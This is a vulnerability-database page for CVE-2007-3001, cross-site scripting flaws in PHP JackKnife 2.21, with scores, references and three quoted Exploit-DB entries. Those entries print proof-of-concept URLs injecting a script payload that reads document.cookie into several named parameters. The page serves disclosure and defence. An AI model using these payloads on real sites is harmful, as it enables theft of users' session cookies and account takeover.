CVE-2007-3001
published 2007-06-04CVE-2007-3001: Multiple cross-site scripting (XSS) vulnerabilities in PHP JackKnife (PHPJK) allow remote attackers to inject arbitrary web script or HTML via (1) the sUName…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.90%
77.0th percentile
Multiple cross-site scripting (XSS) vulnerabilities in PHP JackKnife (PHPJK) allow remote attackers to inject arbitrary web script or HTML via (1) the sUName parameter to UserArea/Authenticate.php, (2) the sAccountUnq parameter to UserArea/NewAccounts/index.php, or the (3) iCategoryUnq, (4) iDBLoc, (5) iTtlNumItems, (6) iNumPerPage, or (7) sSort parameter to G_Display.php, different vectors than CVE-2005-4239.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_jackknife | php_jackknife | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP JackKnife 2.21 - '(PHPJK) G_Display.php' Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2007-05-31
CVE-2007-3001 PHP JackKnife 2.21 - '(PHPJK) G_Display.php' Multiple Cross-Site Scripting Vulnerabilities
PHP JackKnife 2.21 - '(PHPJK) G_Display.php' Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq= '">alert(document.cookie)
http://www.example.com/PHPJK/G_Display.php?iDBLoc= '">alert(document.cookie)
http://www.example.com/PHPJK/G_Display.php?iTtlNumItems= '">alert(document.cookie)
http://www.example.com/PHPJK/G_Display.php?&iNumPerP
Exploit-DB
PHP JackKnife 2.21 - '/(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting
exploitdb·2007-05-31
CVE-2007-3001 PHP JackKnife 2.21 - '/(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting
PHP JackKnife 2.21 - '/(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq= '">alert(document.cookie)
Exploit-DB
PHP JackKnife 2.21 - '/(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting
exploitdb·2007-05-31
CVE-2007-3001 PHP JackKnife 2.21 - '/(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting
PHP JackKnife 2.21 - '/(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/UserArea/Authenticate.php?sUName= '">alert(document.cookie)
No writeups or analysis indexed.
http://osvdb.org/38877http://osvdb.org/38878http://osvdb.org/38879http://securityreason.com/securityalert/2768http://www.securityfocus.com/archive/1/470111/100/0/threadedhttp://www.securityfocus.com/bid/24253https://exchange.xforce.ibmcloud.com/vulnerabilities/34643http://osvdb.org/38877http://osvdb.org/38878http://osvdb.org/38879http://securityreason.com/securityalert/2768http://www.securityfocus.com/archive/1/470111/100/0/threadedhttp://www.securityfocus.com/bid/24253https://exchange.xforce.ibmcloud.com/vulnerabilities/34643
2007-06-04
Published